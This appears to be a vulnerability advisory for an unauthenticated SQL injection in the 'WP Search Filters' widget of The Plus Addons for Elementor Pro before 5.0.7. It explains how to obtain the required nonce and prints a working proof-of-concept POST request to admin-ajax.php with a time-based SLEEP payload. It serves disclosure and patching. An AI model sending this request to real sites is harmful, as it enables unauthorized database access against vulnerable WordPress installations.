The Plus Addons for Elementor Pro < 5.0.7 - Unauthenticated SQL Injection

2021-12-1300:00:00

Nicolas Vidal from TEHTRIS

plus addons

elementor pro

sql injection

unauthenticated

security

admin-ajax

exploit

EPSS

0.002

Percentile

53.0%

JSON

The “WP Search Filters” widget of the plugin does not sanitise and escape the option parameter before using it in a SQL statement, which could lead to SQL injection

The request requires a nonce (created with wp_create_nonce("theplus-searchfilter”)) which can be retrieved from a page where the widget is present, by looking at the source for "security".

POST /wp-admin/admin-ajax.php HTTP/2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 253

action=theplus_filter_post&nonce=b74e4cfaa0&option[0][filtertype]=search_list&option[0][post_type]=product&option[0][seapara][0][type]=taxonomy&option[0][seapara][0][field]=rating&option[0][seapara][0][value]=0+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))SQLi)

References

roadmap.theplusaddons.com/updates

EPSS

0.002

Percentile

53.0%

JSON

Related for WPEX-ID:9D7F8BA8-A5D5-4EC3-A48F-5CD4B115E8D5